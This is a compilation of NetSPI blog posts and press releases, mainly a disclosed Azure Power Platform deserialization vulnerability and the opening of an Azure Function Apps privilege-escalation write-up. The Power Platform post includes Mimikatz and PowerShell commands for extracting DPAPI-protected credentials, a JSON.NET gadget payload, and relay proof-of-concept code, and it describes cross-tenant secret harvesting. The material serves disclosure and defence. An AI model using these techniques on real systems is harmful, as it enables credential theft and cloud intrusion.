Back

5 Reasons Why Your Biggest Cyber Risk Is Your Controls Spreadsheet

This is a guest post contributed by NetSPI’s partner, OpsEase.
Learn more about becoming a NetSPI partner here.


Using a spreadsheet to track and manage your controls will leave you ripe for a breach. Here’s why: You’re probably one of two types of companies.  

Scenario #1: Paying for a GRC Tool 

You’ve realized using spreadsheets for control and risk management  is a risk in of itself and shelled out big bucks to deploy a Governance, Risk Management and Compliance (GRC) solution.  

Scenario #2: Using Spreadsheets to Track Controls 

You’re like so many other companies and have evaluated GRC options only to find that they’re all too expensive. You then use a spreadsheet to build & track your controls through manual efforts. 

If you’re in camp A, congrats, you’re ahead of the game, however likely at a relatively high cost. But most companies I’ve talked with cannot justify the cost of a GRC tool and fall into the camp B — using a spreadsheet to manage controls and risks.  

As a business owner myself I completely understand. A spreadsheet doesn’t cost anything and we can get by our audit. We can show our customers and vendors a good story with our control framework. Our cyber insurance isn’t asking for too much documentation at this point so we can slide by… but the hidden costs and risks of a spreadsheet outweigh the cost of a reasonably priced GRC solution.  

5 Reasons Spreadsheets Don’t Provide Flawless Implementation of Controls

So, why is a spreadsheet your biggest cyber risk? Many possible threats exist today:  

  • Attackers trying to phish your employees 
  • Outdated systems without the latest patches 
  • A loose access control policy 
  • And a plethora of other risks 

Fortunately, your control framework has an answer to each of these. Moreover, if you flawlessly implemented and followed your control framework without fail, you’d reduce security risk exposure drastically. However, using a spreadsheet makes it impossible to flawlessly implement or follow your controls.  

Here are the top reasons why using spreadsheets for controls and risk register are your greatest security threat.  

  1. Spreadsheets are not collaborative. To be more specific, they don’t provide an ability to have controlled collaboration. Excel, SharePoint and Google Sheets are collaborative tools but they are designed for open collaboration vs. controlled. You cannot easily control visibility or assign only a subset of controls to internal or external resources.

    Locking down or hiding cells isn’t really a functional solution especially when working with an external entity like a vendor. The last thing you want to do is to give your vendor access to your security framework spreadsheet with all your controls. Your likely workaround is to send them a subset of controls in a different spreadsheet or document and then copy / paste the responses back which is manual collaboration at best.  
  1. Spreadsheets cannot be automated. So much of our world has embraced automation to ensure process adherence, efficiency, and greater compliance to an outcome. Being able to assign controls, track completion, flag risks and alert on potential incidents is the next step to improve security, track risks and prepare for an audit. If it can’t be systematically controlled to ensure adherence, it’s a risk.  
  2. Spreadsheets are ripe for human errors. An age old reality is that anytime there’s the potential for human error, it will likely happen at some point.

    Bob in IT forgets to check the firewall logs. A Microsoft SQL workload isn’t patched for months at a time and no one is checking. Sally leaves the company and still has access to the core systems months after departing.

    These are all simple examples of a control failing to be handled and the CISO or security team having no visibility or ability to track the risk.  
  3. Spreadsheets are not file systems. You cannot attach control documentation to a spreadsheet. Specifically, log files, screenshots, checklists, and the variety of other ways you need to document your controls cannot be attached, organized and presented in a spreadsheet. Most companies create a folder structure to store these files and link them into the spreadsheet. This process is terribly time consuming, fraught with potential errors (see point 3), isn’t easily collaborative (point 1), and can’t be automated (point 2) for approvals to ensure the documentation is compliant with the control.  
  4. Spreadsheets are not good enough for your auditors. They want to see proof of actions, especially attestation that something was done. A GRC system is the record of truth so that you can show your auditor and not have to dig through emails or meeting notes where you took action on a periodic control.  

By now you’ve realized that we have a distinct opinion on why spreadsheets simply do not cut it. Using them for your security framework is one of your greatest risks. Visit OpsEase, the GRC tool to help make compliance easy and affordable. 

Built by security professionals for security professionals, OpsEase is an IT security governance, risk and control (GRC) solution designed for SMB and mid-market companies to better monitor and manage their security controls. OpsEase gives solution providers a single pane of glass to manage your security frameworks, for your company or customers you manage, creating greater value for both you and your customers.

Back

Riding the Azure Service Bus (Relay) into Power Platform

Azure maintains a large suite of automation tools between Logic Apps and the Power Platform (Automate, Apps, BI). On-Prem Data Gateways extend some of these automations by allowing actions to be carried out by a connected agent installed locally in customer networks.  

Originally these gateways were just designed for Power BI and “personal use” only, but you can also connect them to an Azure tenant and make them available to the larger subscription. In essence, you can bind an on-prem data gateway to an Azure gateway1 resource, then leverage that on-prem data gateway in a limited set of Power Platform Connectors from Logic Apps. Microsoft maintains a list of these supported connectors in their documentation (we also queried support via APIs to verify its accuracy): 

  • Apache Impala 
  • BizTalk Server 
  • File System 
  • HTTP with Azure AD 
  • IBM DB2 / Informix / MQ
  • MySQL 
  • Oracle Database 
  • PostgreSQL 
  • SAP 
  • SharePoint Server
  • SQL Server 
  • Teradata 

Originally, we wanted to inspect how these logic apps interact with gateways and discover code execution opportunities from an azure tenant into a host network. You might imagine the ability to access file data or force web requests on remote hosts as quite valuable to an attacker. However, our research led us in a more interesting direction that involved cross-tenant compromise in Power Platform Connectors hosted in Azure.

Installation Internals

The installation and setup of the gateway is straightforward. During the initial setup you’ll be prompted for account credentials, gateway name, and recovery key. After installation, the gateway should be bonded to the Power Platform, and you can verify its availability in the Admin Portal. Connecting the gateway to an Azure subscription does require you allocate a separate “On-Prem Gateway” object via the portal. It’s worth double checking your region and target subscription before the gateway object becomes available under “Installation Name”. 

On-premises data gateway portal in Azure.
Power Platform admin center showing gateway cluster: demo-gateway.
Subscription and instance details within Azure data gateway.

Back on the gateway host, a service for Microsoft.PowerBI.EnterpriseGateway.exe will be installed to run core functions. A configuration app EnterpriseGatewayConfigurator.exe is available to view the status of the service, reconfigure parameters, run diagnostics, etc. Underneath their relationship is backed by a localhost WCF TCP ServiceHost (IGatewayConfigurationService) using a ServiceAuthorizationManager to limit access to administrators. 

Any curiosity regarding the “recovery key” we supplied is well founded. Gateways support both symmetric and asymmetric encryption to securely transfer sensitive credentials. When registering the gateway, the recovery key will be used to derive a symmetric key stored by the gateway host. Random bytes will be encrypted with this key and attached to an annotation field on the gateway object in the Power Platform (referred to as a “witness string”). This allows client-side verification of a matching key during recovery/change operations. In addition to symmetric material, an RSA keypair will be generated by the service and the public component will be transferred during creation. As clarified by Microsoft, the symmetric key is retained locally as a derivation of the recovery key value. 

We can see the client request to create the gateway here:

PUT /unifiedgateway/gateways/CreateGatewayWithApps HTTP/2 
Host: wabi-us-north-central-redirect.analysis.windows.net 
Authorization: Bearer [token] 

{ 
    "createGatewayRequest": { 
        "gatewayName": "demo-gateway", 
        "gatewayDescription": null, 
        "gatewayAnnotation": "{\"gatewayContactInformation\":[\"noexist@netspi.com\"],\"gatewayVersion\":\"3000.154.3\",\"gatewayWitnessString\":\"{\\\"EncryptedResult\\\":\\\"qAesqTDEw5WdQq[…]\\\",\\\"IV\\\":\\\"Zqq9Hc2qIFNzVOBEz5ymsg==\\\",\\\"Signature\\\":\\\"i9Urdz0HlpRBEuklU[…]\\\"}\",\"gatewayMachine\":\"DESKTOP-BDI31DO\",\"gatewaySalt\":\"51lQj3EFVfousJiQuSQdYQ==\",\"gatewayWitnessStringLegacy\":null,\"gatewaySaltLegacy\":null,\"gatewayDepartment\":null,\"gatewayVirtualNetworkSubnetId\":null}", 
        "gatewayPublicKey": "PD94bWwgdmVyc2lvbj0iMS4wIj8+DQo8UlNBUGFyYW1ldGVycyB4bWxuczp4c2Q9Imh0dHA[…]", 
        "gatewayVersion": "3000.154.3", 
        "gatewaySBDetails": null, 
        "gatewaySBDetailsSecondary": null, 
        "createSecondaryRelay": true 
    } 
}

The response to this request gives us additional context for how the gateway communicates with other components:

HTTP/2 200 OK 
Content-Type: application/json; charset=utf-8 
Requestid: f30a7f4a-8dea-4b66-abe3-430054f0ed72 

{ 
    "gatewayId": 3139190, 
    "gatewayObjectId": "7a67b558-5ec0-4588-8c97-c2dd8ee2fb1d", 
    "gatewayName": "demo-gateway", 
    "gatewayType": "Resource", 
    "gatewaySBDetails": { 
        "gatewaySBKey": "ABBBmLK2loqL7yY414H/X33xAADL3Q/QZPLeyxbb14=", 
        "gatewaySBKeyName": "ListenAccessKey", 
        "gatewaySBEndpoint": "sb://wabi-us-north-central-relay12.servicebus.windows.net/4ec23ba7-6ebd-4ab4-921a-5256e2a27a70/" 
    }, 
    "gatewaySBDetailsSecondary": null, 
    "deprecatedServiceBusNamespace": null, 
    "deprecatedServiceBusEndpoint": null, 
    "deprecatedServiceBusNamespaceSecondary": null, 
    "deprecatedServiceBusEndpointSecondary": null 
}

On-Prem Data Gateways leverage an allocated Azure Relay connection (gatewaySBDetails) to securely expose its service to the public cloud. This was formerly known as Service Bus Relay hence the Service Bus key names. This allows cloud resources to bind to the gateway as if it were another cloud service and issue data processing requests. Users can supply their own relay details, or have the Power Platform allocate one. This relationship is managed by the Microsoft.PowerBI.* libraries and leverages a NetTcpRelayBinding and ServiceHost to expose the gateway to the public cloud. You can think of this as a reverse proxy to the gateway host via Azure Relay. 

In terms of connecting to this Azure Relay, the key material is readily available to us by proxying web traffic during installation. However, inspecting the local storage of this data is also a valuable exercise. All sensitive config data is stored in “%LocalAppData%\Microsoft\On-premises data gateway\Gateway.bin” from the context of the service account. It’s serialized JSON block with values protected by user-context DPAPI keys. We can perform a quick extraction using Mimikatz and Powershell: 

Extract the credentials and write blobs to disk: 

PS> $file = "C:\Windows\ServiceProfiles\PBIEgwService\AppData\Local\Microsoft\On-premises data gateway\Gateway.bin" 
PS> $creds = (cat $file | ConvertFrom-Json).credentials 
PS> $creds 

key               value 
---               ----- 
SBD               AQAAANCMnd8BFdERjHoA… 
SBDS              AQAAANCMnd8BFdERjHoA… 
SK                AQAAANCMnd8BFdERjHoA… 
LSK               AQAAANCMnd8BFdERjHoA… 
FileCredentialKey AQAAANCMnd8BFdERjHoA… 

PS> $creds | %{ [IO.File]::WriteAllBytes("$($_.key).bin", 
[Convert]::FromBase64String($_.value)) } 

Get the DPAPI_SYSTEM and service key with Mimikatz: 

PS> .\mimikatz.exe 
mimikatz # token::elevate 
mimikatz # lsadump::secrets 
mimikatz # dpapi::masterkey /in:"C:\Windows\ServiceProfiles\PBIEgwService\AppData\Roaming\Microsoft\Protect\[SID]\[KEY_GUID]" /system:[DPAPI_SYSTEM]

Decrypt the credential blobs:

mimikatz # dpapi::blob /in:SBD.bin /ascii 
mimikatz # dpapi::blob /in:SBDS.bin /ascii 
mimikatz # dpapi::blob /in:SK.bin /ascii 
mimikatz # dpapi::blob /in:LSK.bin /ascii 
mimikatz # dpapi::blob /in:FileCredentialKey.bin /ascii

The contents of FileCredentialKey give us the best context into the other values. The SBD blob is the allocated Azure Relay information from gateway creation, the SK blob is the symmetric key derived from the recovery value, and keyContainerName is the CSP name for our generated asymmetric key. With installation and some internals out the way, let’s move on to how data is serialized and passed on the relay.

{ 
    "id": 3139190, 
    "isDisconnected": true, 
    "objectId": "a9e6208f-669f-412f-a542-a4538121c38b", 
    "backendUri": "https://wabi-us-north-central-redirect.analysis.windows.net/", 
    "keyContainerName": "OdgAsymmetricKey", 

    "serviceBusDetails": {"index": "SBD"}, 
    "serviceBusDetailsSecondary": {"index": "SBDS"}, 
    "symmetricKey": {"index": "SK"}, 
    "legacySymmetricKey": {"index": "LSK"} 
}

Type Handling and Binders

The interface exposed on the relay backed ServiceHost is very simple. It’s essentially a single TransferAsync function on the gateway side and a callback contract for replying (TransferCallbackAsync). Both functions take a single byte array as their argument.

public interface IGatewayTransferCallback 
{ 
    [OperationContract(IsOneWay = true)] 
    Task TransferCallbackAsync(byte[] packet); 
} 

[ServiceContract(CallbackContract = typeof(IGatewayTransferCallback))] 
public interface IGatewayTransferService 
{ 
    [OperationContract(IsOneWay = true)] 
    Task PingAsync(); 

    [OperationContract(IsOneWay = true)] 
    Task TransferAsync(byte[] packet); 
}

The binary data passed to these functions is referred to as a Relay Packet. These packets are serialized binary data blocks, optionally compressed or chunked, and prefixed with a RelayPacketHeader to provide context.

[Flags] 
public enum ControlFlags : byte 
{ 
    None = 0, 
    EndOfData = 1, 
    HasTelemetry = 2, 
    HasCorrectDataSize = 4, 
} 

public enum XPress9Level 
{ 
    None = 0, 
    Level6 = 6, 
    Level9 = 9, 
} 

public enum DeserializationDirective 
{ 
    Json = 1, 
    BinaryRowset = 2, 
    BinaryVarData = 3, 
} 

[StructLayout(LayoutKind.Explicit, Size = 21, Pack = 1)] 
public sealed class RelayPacketHeader 
{ 
    private ControlFlags flags; 
    private int index; 
    private int uncompressedDataSize; 
    private int compressedDataSize; 
    private XPress9Level compressionAlgorithm; 
    private DeserializationDirective deserializationDirective; 
}

We are predominantly concerned with the Json deserialization directive, which is supported by standard JSON.NET (Newtonsoft) libraries. The inspection of core deserialization code leads us to an extremely concerning TypeNameHandling.All configuration.

static T JsonDeserialize<T>(string payload) where T : class 
{ 
    JsonSerializerSettings settings = new JsonSerializerSettings() 
    { 
        TypeNameHandling = TypeNameHandling.All, 
        SerializationBinder = (ISerializationBinder)new DataMovementSerializationBinder() 
        // ... 
    }; 

    return JsonConvert.DeserializeObject<T>(payload, settings); 
}

It would appear some considerations are made for type security. The DataMovementSerializationBinder is applied to check incoming type names for validity. However, the use of serialization binders for security is not recommended and this binder is a great example of why. 

We’ve extracted just a small snippet of the decompiled source, but the relevant weakness is the allow listing of any types from PowerBI, DataMovement, and Mashup assemblies in IsAcceptableAssemblyName regardless of the specific type. 

public Type BindToType(string assemblyName, string typeName) { 
    if (this.IsAcceptableBasicTypeName(typeName) ||  
        this.IsAcceptableAssemblyName(assemblyName) || 
        this.IsAcceptableDictionaryType(typeName) ||  
        this.IsAcceptableMscorlibException(assemblyName, typeName) 
    ) { 
        return this.serializationBinder.BindToType(assemblyName, typeName) 
    } 

    return null; 
} 

private bool IsAcceptableAssemblyName(string assemblyName) { 
    return assemblyName.StartsWith("Microsoft.PowerBI") ||  
        assemblyName.StartsWith("Microsoft.DataMovement") ||  
        assemblyName.StartsWith("Microsoft.Mashup") ||  
        assemblyName.StartsWith("Microsoft.Data.Mashup"); 
}

A quick scan of available types leads us to Microsoft.Mashup.Storage.SerializableDictionary, an overload of a standard Dictionary class with a controllable value type that won’t be checked. We also need to find a vulnerable object tree that types some property as a generic Object to bypass IsAssignableTo checks, but that’s also quite trivial. Ultimately Microsoft.PowerBI.DataMovement.Pipeline.InternalContracts.Communication.GatewayHttpWebRequest with a nested Microsoft.Mashup.Storage.SerializableDictionary for our WindowsIdentity gadget gets the job done: 

{ 
  '$type': 'Microsoft.PowerBI.DataMovement.Pipeline.InternalContracts.Communication.GatewayHttpWebRequest, Microsoft.PowerBI.DataMovement.Pipeline.InternalContracts', 
  'request': { '$type': 'System.Byte[], mscorlib', '$value': '/w==' }, 
  'property': { 
    '$type': 'System.Collections.Generic.Dictionary`2[[System.String, mscorlib],[System.Object, mscorlib]], mscorlib', 
    'foo': { 
      '$type': 'Microsoft.Mashup.Storage.SerializableDictionary`2[[System.String, mscorlib],[System.Security.Principal.WindowsIdentity, mscorlib]], Microsoft.MashupEngine', 
      'bar': { 
        'System.Security.ClaimsIdentity.actor': '**PAYLOAD**' 
      } 
    } 
  } 
}

Return to Sender

We now have the primitive necessary to exploit processing code on either end of the Azure Relay for code execution. We could attempt to target the gateway itself but gaining remote access to the required access keys makes this a very limited attack vector. However, going the other way is much more interesting. The Power Platform runtime, which puts messages on the relay, likely leverages the same serialization code and we already understand how to communicate on the relay. 

We can now leverage a minimal Azure relay client to bind to the cloud and wait for tasking. When a Power Platform Connector communicates with the gateway, we can wrap our serialization payload in a RelayPacketHeader and deliver it using TransferCallbackAsync. Getting the Power Platform to communicate with the fake gateway is straight-forward. We set up a fresh Logic App, select one of the on-prem supported connectors, and trigger any activity against our gateway (test connection, store credentials, query data, etc.). You can find the proof-of-concept on Github and the relevant code below.

class GatewayTransferService : IGatewayTransferService 
{ 
    public Task PingAsync() { 
        return new Task(() => {}); 
    } 

    public Task TransferAsync(byte[] bytes) 
    { 
        string Payload = "..."; 

        var response = Encoding.Unicode.GetBytes(Payload); 
        byte[] responseBytes = new byte[response.Length + RelayPacketHeader.Size]; 

        new RelayPacketHeader() 
        { 
            HasCorrectDataSize = true, 
            IsLast = true, 
            Index = 0, 
            UncompressedDataSize = response.Length, 
            CompressedDataSize = response.Length, 
            CompressionAlgorithm = XPress9Level.None, 
            DeserializationDirective = DeserializationDirective.Json 
        }.Serialize(responseBytes); 

        Array.Copy((Array)response, 0, (Array)responseBytes, RelayPacketHeader.Size, response.Length); 

        IGatewayTransferCallback callback = OperationContext.Current.GetCallbackChannel<IGatewayTransferCallback>(); 
        return callback.TransferCallbackAsync(responseBytes); 
    } 
} 

// ... 

ServiceBusEnvironment.SystemConnectivity.Mode = ConnectivityMode.Http; 

ServiceHost serviceHost = new ServiceHost(typeof(GatewayTransferService)); 

serviceHost.AddServiceEndpoint( 
    typeof(IGatewayTransferService), 
    new NetTcpRelayBinding() { IsDynamic = false }, 
    Endpoint 
).Behaviors.Add( 
    new TransportClientEndpointBehavior { 
        TokenProvider = TokenProvider.CreateSharedAccessSignatureTokenProvider(KeyName, Key) 
    } 
); 

serviceHost.Open();
Logic Apps Designer showing the Power Platform application.

Depending on the connector used, different backends will process the final payload. Initially we delivered various exploratory payloads using various connectors, which in turn would exfiltrate environmental data to an Azure Function App. We selected the most promising backend without additional obvious sandboxing (HTTP w/ Azure AD) and deployed a full stage 2 agent into memory (Slingshot). We achieved SYSTEM access, and the execution environment was clearly deep inside first-party Power Platform services in Azure.  

From the compromised host, the IMDS endpoint granted access to an authentication token for various key vault secrets and keys. We retrieved fabric configuration files, tenant information, and access to managed identities. From the decrypted Azure VM extension settings, we were able to identify Storage Account keys along with several valid SAS token Storage Account URLs configured with long expiration durations (~3 months) and the ability to list and read files (sp=rl). Overall, we calculated access to at least 1,300 secrets/certs over ~180 vaults. When it was clear cross-tenant access was possible, we burned off the affected hosts and a full report was delivered to MSRC.

Screenshot showing code execution on power platform connectors host.
Screenshot showing cross-tenant access in Azure.
Screenshot showing cross-tenant access in Azure.

Conclusion

Microsoft fixed this issue by completely rebuilding their serialization binder to enforce much stricter type allow list. They also appear to have distinct binders for both the gateway and cloud sides, but safe serialization in such a complex system clearly remains a tricky task even for Microsoft. There are many areas of related research that we didn’t get to. The Power Platform and its relationship to Azure is rich in technical complexity. I’m sure a motivated researcher could yield more interesting results from the execution of requests in the client, individual logic app functionality, gateway APIs, and data sanitization. As we also discovered, different logic apps appeared to be supported by an array of backend systems with different configurations, isolations, and intents. I hope this post can inspire fresh eyes to look at these systems more. 

icon
icon
icon
icon
icon
icon

Read more of NetSPI’s cloud penetration testing research on our technical blog.

Appendix A – Disclosure Timeline 

  • September 2022: Report filed with MSRC. 
  • October 2022: MSRC opens case 75270 and additional details are provided. 
  • October 2022: Call with MSRC stakeholders to demonstrate vulnerability. 
  • November 2022: Fix is deployed to public cloud. 
  • December 2022: Fix is deployed to all remaining regions. 

Appendix B – References 

Back

NetSPI Uncovers Cross-Tenant Azure Vulnerability in Power Platform Connectors

NetSPI VP of Research finds cross-tenant compromise in popular Azure automation tool, works closely with Microsoft to remediate the issue.

Minneapolis, MN NetSPI, the leader in offensive security, today disclosed the threat research findings of Vice President of Research Nick Landers who discovered and reported a cross-tenant compromise in Power Platform Connectors, a first party provider hosted in Microsoft Azure.  

In close collaboration with NetSPI, Microsoft quickly fixed the issue. Due to the cross-tenant implications of this vulnerability, if it were left unresolved, malicious attackers could have jumped between tenants using the Power Platform Connectors backend and gained access to sensitive data, Azure access tokens, and more. 

As background, Azure features a large suite of automation tools, including Logic Apps and the Power Platform. On-Prem Data Gateways extend these automation tools, allowing actions to be carried out by a connected agent installed locally in customer networks – which is where Landers found the vulnerability. Originally, these gateways were intended for personal use only, but users can also connect them to an Azure tenant and make them available to the larger subscription. In Landers’ research, he inspected how these Logic Apps interact with data gateways and discovered remote code execution opportunities on both the gateways themselves and the supporting Power Platform Connectors hosted in Azure, allowing for the compromise of cross-tenant data. 

“This vulnerability is yet another example of just how pervasive deserialization flaws continue to be, especially for large technology vendors like Microsoft,” explains Landers. “Security teams should be aware of deserialization-based vulnerabilities, assume most connected systems and apps are exploitable, and understand that the simple exploitation might be buried in a bit of technical complexity. I welcome the research community to join me in continued deserialization research as we work to make cross-tenant environments more secure.”  

Landers worked closely with the Microsoft Security Response Center (MSRC) to disclose and remediate the issue. As a resolution, the Power Platform team completely rebuilt their serialization binder to enforce stricter whitelists, while creating distinct binders for both gateway and cloud environments.  

A technical explanation of the vulnerability discovery can be found in the NetSPI technical blog, Riding the Azure Service Bus (Relay) into Power Platform. To connect with NetSPI for Azure cloud penetration testing, visit www.NetSPI.com.

About NetSPI  

NetSPI is the leader in enterprise penetration testing, attack surface management, and breach and attack simulation – the most comprehensive suite of offensive security solutions. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, its global cybersecurity experts have been committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading global cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and the top 50 companies in the Fortune 500. NetSPI is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India.

Media Contacts: 
Tori Norris, NetSPI 
victoria.norris@netspi.com
(630) 258-0277  

Jessica Bettencourt, Inkhouse for NetSPI
netspi@inkhouse.com
(774) 451-5142 

Back

6 Questions to Plan for Blockchain Security

Blockchain is an effective business strategy that extends beyond the buzz of cryptocurrencies. Businesses are using blockchain for real-time transactions and secure payments at scale. Blockchain deployments vary for every organization, but its many uses and successes so far make it a technology to keep researching.

Planning for cybersecurity at the beginning of blockchain exploration helps create more secure deployments, especially when working with valuable financial information. The six questions below can guide internal conversations to align resources around secure blockchain deployments. Get more blockchain security tips in our eBook, “5 Blockchain Security Fundamentals Every C-Suite Needs to Know.”

Definition of Blockchain, or Distributed Ledger Technology (DLT) 

Distributed Ledger Technology (DLT), commonly known as “blockchain” is a distributed database secured with cryptography. How this unfolds in reality has many interpretations. One commonality runs through every blockchain use: every participant has a vested interest in the trustworthiness of the data. This creates an environment for secure transactions after servers, or nodes, work together to establish the real state of a database.  

“Blockchain is fundamentally a distributed database secured with cryptography.” 

One example of blockchain is smart contracts. They act as web applications stored directly on the chain and operate deterministically without requiring an entity to execute the code. Smart contracts allow responsible parties to communicate information including transactions without the use of an intermediary. 

The many unique use cases of blockchain give it vast appeal, but it may be particularly useful in industries such as large financial institutions and retail groups. 

Blockchain Security in Deployments 

Much of the data handled with blockchain is considered sensitive, therefore making it valuable to malicious actors. As with many newer technologies, vulnerabilities can become an issue if security is not baked in from the start. 

“Like any other technology, security flaws are typically discovered/introduced during integration, as opposed to being inherent to the technology itself.” 

Blockchain security issues can emerge from container configurations, vulnerable contract code, or weak permission models to name a few. Exploring blockchain uses through a cybersecurity lens puts organizations ahead of weaknesses or gaps before vulnerabilities occur.

Move beyond the challenge of digital asset acceptance with NetSPI’s blockchain security services. Optimize Blockchain Use.

6 Questions to Prioritize Blockchain Security 

These guiding questions will help uncover expectations and requirements as companies continue blockchain research. Use these as a starting point to gain alignment between IT and security teams, as well as other internal departments who may be affected by blockchain use. 

  1. Are teams in my organization pursuing blockchain uses? Have they consulted the security team for potential risks? Do we have trusted providers in place for third-party blockchain pentesting? Are we rushing the development of DLT solutions without proper security processes in place?  
  2. What chain technologies are going to be part of our deployments? Are these chains public/permissionless chains like Ethereum or Bitcoin? Or do we want to work with a permissioned chain system like Hyperledger?
  3. Are we developing or deploying smart contracts? Do we have a secure SDLC process developed for DLT? Is our development team properly trained in the security considerations of the chain? How will we support contract updates and security fixes? Do we have code audit plan in place?
  4. Are we running our own nodes as part of the chain use? Will these be deployed on-premises, in Azure/AWS, or via a managed provider like IBM or Oracle? Have we considered configuration reviews for the supporting containers and hosts? Do we have threat models for other malicious nodes on the chain? Have we considered supply-chain threats for the code base?
  5. Are we performing any custodial or direct ownership of digital assets? Is transaction signing and logic part of our solution? How are we securely managing cryptographic keys? Do we have key recovery process in place? Are we relying entirely on third party APIs to access the chain?
  6. Are we integrating with any off-chain assets (databases, APIs, etc.)? Have we mapped out threat scenarios related to state-desynchronization? Are we properly leveraging the native security of chain transactions for key logic? Are we storing sensitive data on the chain? 

Make Blockchain Security Part of Your Strategy 

The goal of DLT is to create a shared database which can be trusted by multiple entities who don’t necessarily trust one another. Blockchain is the answer to this challenge, but it’s a newer technology with its full potential still being realized. 

Continue your blockchain research by accessing our eBook “5 Blockchain Security Fundamentals Every C-Suite Needs to Know” or accelerate your blockchain use by connecting with our experts.

Back

NetSPI Finds Privilege Escalation Vulnerability in Azure Function Apps

Cloud penetration testing leader identifies privilege escalation flaw in Azure’s popular solution for building cloud-native applications.

Minneapolis, MN NetSPI, the leader in offensive security, today published details on a vulnerability found by Vice President of Research Karl Fosaaen, who discovered a flawed functionality in Azure Function Apps that allowed for privilege escalation. 

Fosaaen and the NetSPI research team worked closely with Microsoft to resolve the issue. If left unresolved, users with ‘read only’ permissions on a Function App could gain full access to the Azure Function App container, granting them the ability to view and alter highly sensitive information, like backend code databases and password vaults. 

Function Apps is used for building cloud-native applications in Azure. At its core, Function Apps is a lightweight API service that can be used for building and hosting serverless applications. The Azure Portal allows users to view files associated with the Function App, along with the code for the application endpoints. 

“We see the Function Apps service used in about 80 percent of our penetration testing environments. With this being a privilege escalation issue, a minimally authorized user could have been given access to critical, often restricted roles that would allow them to pivot within an Azure subscription,” said Fosaaen. “Given the simplicity of the issue, it’s surprising that this vulnerability has made it this far without previously being detected, especially with the rise in APIs and cloud-native apps over the past few years.”

Fosaaen worked closely with the Microsoft Security Response Center (MSRC) to disclose and remediate the file access issues. The Reader role no longer has the ability to read files with the Function App VFS APIs. A technical overview of the vulnerability can be found on the NetSPI blog.  

The NetSPI Labs innovation and research group plans to continue exploring read-only privilege escalation opportunities across Azure. You can see the team’s cloud security research and past vulnerability disclosures at www.netspi.com.

About NetSPI  

NetSPI is the leader in enterprise penetration testing, attack surface management, and breach and attack simulation – the most comprehensive suite of offensive security solutions. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, its global cybersecurity experts have been committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading global cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and the top 50 companies in the Fortune 500. NetSPI is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India.

Media Contacts: 
Tori Norris, NetSPI 
victoria.norris@netspi.com
(630) 258-0277  

Jessica Bettencourt, Inkhouse for NetSPI
netspi@inkhouse.com
(774) 451-5142 

Back

Escalating Privileges with Azure Function Apps

As penetration testers, we continue to see an increase in applications built natively in the cloud. These are a mix of legacy applications that are ported to cloud-native technologies and new applications that are freshly built in the cloud provider. One of the technologies that we see being used to support these development efforts is Azure Function Apps. We recently took a deeper look at some of the Function App functionality that resulted in a privilege escalation scenario for users with Reader role permissions on Function Apps. In the case of functions running in Linux containers, this resulted in command execution in the application containers. 

TL;DR 

Undocumented APIs used by the Azure Function Apps Portal menu allowed for arbitrary file reads on the Function App containers.  

  • For the Windows containers, this resulted in access to ASP. Net encryption keys. 
  • For the Linux containers, this resulted in access to function master keys that allowed for overwriting Function App code and gaining remote code execution in the container. 

What are Azure Function Apps?

As noted above, Function Apps are one of the pieces of technology used for building cloud-native applications in Azure. The service falls under the umbrella of “App Services” and has many of the common features of the parent service. At its core, the Function App service is a lightweight API service that can be used for hosting serverless application services.  

The Azure Portal allows users (with Reader or greater permissions) to view files associated with the Function App, along with the code for the application endpoints (functions). In the Azure Portal, under App files, we can see the files available at the root of the Function App. These are usually requirement files and any supporting files you want to have available for all underlying functions. 

An example of a file available at the root of the Function App within the Azure Portal.

Under the individual functions (HttpTrigger1), we can enter the Code + Test menu to see the source code for the function. Much like the code in an Automation Account Runbook, the function code is available to anyone with Reader permissions. We do frequently find hardcoded credentials in this menu, so this is a common menu for us to work with. 

A screenshot of the source for the function (HttpTrigger1).

Both file viewing options rely on an undocumented API that can be found by proxying your browser traffic while accessing the Azure Portal. The following management.azure.com API endpoint uses the VFS function to list files in the Function App:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tes
ter/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//?rel
ativePath=1&api-version=2021-01-15 

In the example above, $SUB_ID would be your subscription ID, and this is for the “vfspoc” Function App in the “tester” resource group.

Identify and fix insecure Azure configurations. Explore NetSPI’s Azure Penetration Testing solutions.

Discovery of the Issue

Using the identified URL, we started enumerating available files in the output:

[
  {
    "name": "host.json",
    "size": 141,
    "mtime": "2022-08-02T19:49:04.6152186+00:00",
    "crtime": "2022-08-02T19:49:04.6092235+00:00",
    "mime": "application/json",
    "href": "https://vfspoc.azurewebsites.net/admin/vfs/host.
json?relativePath=1&api-version=2021-01-15",
    "path": "C:\\home\\site\\wwwroot\\host.json"
  },
  {
    "name": "HttpTrigger1",
    "size": 0,
    "mtime": "2022-08-02T19:51:52.0190425+00:00",
    "crtime": "2022-08-02T19:51:52.0190425+00:00",
    "mime": "inode/directory",
    "href": "https://vfspoc.azurewebsites.net/admin/vfs/Http
Trigger1%2F?relativePath=1&api-version=2021-01-15",
    "path": "C:\\home\\site\\wwwroot\\HttpTrigger1"
  }
]

As we can see above, this is the expected output. We can see the host.json file that is available in the Azure Portal, and the HttpTrigger1 function directory. At first glance, this may seem like nothing. While reviewing some function source code in client environments, we noticed that additional directories were being added to the Function App root directory to add libraries and supporting files for use in the functions. These files are not visible in the Portal if they’re in a directory (See “Secret Directory” below). The Portal menu doesn’t have folder handling built in, so these files seem to be invisible to anyone with the Reader role. 

Function app files menu not showing the secret directory in the file drop down.

By using the VFS APIs, we can view all the files in these application directories, including sensitive files that the Azure Function App Contributors might have assumed were hidden from Readers. While this is a minor information disclosure, we can take the issue further by modifying the “relativePath” parameter in the URL from a “1” to a “0”. 

